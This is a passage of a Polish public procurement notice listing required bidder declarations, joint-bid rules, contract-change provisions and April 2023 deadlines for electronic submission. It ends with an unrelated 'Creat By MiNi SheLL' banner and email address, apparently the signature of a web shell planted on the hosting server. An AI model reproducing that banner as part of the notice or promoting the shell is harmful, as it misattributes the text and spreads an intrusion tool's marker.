Wykonawca, który, stosownie do<br/>sekcji V.5.4.) ust. 4 ogłoszenia, przy wykazywaniu spełnienia określonego w V.5.4.) ust. 2<br/>ogłoszenia warunku udziału w niniejszym postępowaniu powołuje się na zasoby wskazanego<br/>tam PODMIOTU TRZECIEGO.<br/>4) Oświadczenie, o którym mowa w art. 117 ust. 4 ustawy PZP, z którego będzie wynikać, które<br/>usługi spośród stanowiących przedmiot niniejszego zamówienia wykonają poszczególni<br/>Wykonawcy wspólnie ubiegający się o zamówienie [stosownie do wymogu sekcji V.5.4.) ust. 4<br/>pkt 2) ogłoszenia] – przy czym tylko w przypadku, gdy spełnienie określonego w sekcji V.5.4.)<br/>ust. 2 ogłoszenia warunku udziału w niniejszym postępowaniu opiera się na zdolnościach<br/>Wykonawców wspólnie ubiegających się o zamówienie<br/>5) Odpis lub informacja z Krajowego Rejestru Sądowego (KRS), Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej (CEIDG) lub innego właściwego rejestru, Pełnomocnictwa lub<br/>innego dokumentu potwierdzającego umocowanie do reprezentowania w celu potwierdzenia, że<br/>osoba/osoby działające w imieniu Wykonawcy/Wykonawców wspólnie ubiegających się o<br/>zamówienie są uprawnione do reprezentowania danego Wykonawcy przy składaniu oferty, jak<br/>też składaniu przez niego oświadczeń i dokumentów – przy czym tylko w przypadku i w<br/>zakresie, w jakim ich złożenie jest wymagane na podstawie działu IX ust. 15 – 17 SWZ.<br/>Postanowienia powyższe niniejszego punktu będą stosowane odpowiednio (w szczególności<br/>wskazane tam wyjątki od obowiązku przedkładania dokumentów potwierdzających umocowanie<br/>do działania) również do PODMIOTU TRZECIEGO – w przypadku, gdy Wykonawca będzie<br/>wykazywał spełnienie określonego w sekcji V.5.4.) ust. 2 ogłoszenia warunku udziału w niniejszym postępowaniu zdolnościami POMIOTU TRZECIEGO, stosownie do możliwości przewidzianych w tym zakresie zapisami sekcji V.5.4.) ust. 4 ogłoszenia 6) Tłumaczenie składanych oświadczeń i dokumentów na język polski – przy czym tylko w przypadku w zakresie, jakim dane oświadczenie/dokument jest składany w języku obcym. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Stosownie do art. 58 ust. 1 ustawy PZP, Wykonawcy wspólnie ubiegający się o zamówienie<br/>(składający Ofertę wspólną) ustanawiają pełnomocnika do reprezentowania ich w niniejszym<br/>postępowaniu albo do reprezentowania w niniejszym postępowaniu i zawarcia Umowy o<br/>zamówienie. W takim przypadku, postanowienie sekcji V.5.11 pkt 5) będzie również stosowane<br/>odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o<br/>zamówienie, o których mowa w art. 58 ustawy PZP (w przypadku złożenia Oferty wspólnej). Inne<br/>wymagania związane z faktem złożenia oferty wspólnej (Wykonawców wspólnie ubiegających<br/>się o zamówienie) podane są w sekcjach V.5.4), V.5.7) oraz V.5.11 ogłoszenia (i ich<br/>odpowiednikach w tym zakresie w SWZ) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian postanowień niniejszej umowy.<br/>Zakres, charakter zmian oraz warunki ich wprowadzenia podają postanowienia działu XX SWZ<br/>w zestawieniu z Wzorem Umowy (załącznik nr 7 SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-12 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Składanie Zamawiajacemu ofert w niniejszym postepowaniu ( a także ich wycofanie) dopuszczonej jest wyłacznie za pomocą narzędzia (systemu) informatycznego Urzędu Zamówień Publicznych pod nazwą e-Zamówienia , dostępnego na stronie https://ezamowienia.gov.pl/pl.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-12 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-11</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wskazany w sekcji IV.4.3.2 ogłoszenia sposób określenia kryteriów oceny ofert (procentowo) podlega w SWZ przeliczeniu<br/>na punkty według zasady: jeden procent (%) = jeden punkt wagowy. Ilekroć w niniejszym ogłoszeniu używany jest zwrot: 1)<br/>ustawa PZP - należy przez to rozumieć obowiązującą polską ustawę z dnia 11 września 2019 r. - Prawo zamówień<br/>publicznych, 2) SWZ - należy przez to rozumieć obowiązującą w niniejszym postępowaniu specyfikację warunków<br/>zamówienia, o której mowa w art. 281 ustawy PZP, właściwą dla trybu podstawowego bez negocjacji, przyjętego w<br/>niniejszym postępowaniu (wraz z jej załącznikami); 3) Wzór Umowy – należy przez to rozumieć projektowane<br/>postanowienia umowy w sprawie niniejszego zamówienia, których treść zawiera załącznik nr 7 SWZ.<br/>W niniejszym postępowaniu, obok obligatoryjnych podstaw (przesłanek) wykluczenia z udziału w postępowaniu o udzielenie<br/>zamówienia wskazanych w art. 108 ust. 1 ustawy PZP, zastosowanie mają również obligatoryjne podstawy (przesłanki)<br/>wykluczenia z udziału w postępowaniu o udzielenie zamówienia wskazane w art. 7 ust. 1 ustawy z dnia 13.04.2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego (Dz. U. 2022 poz. 835).

Creat By MiNi SheLL
Email: jattceo@gmail.com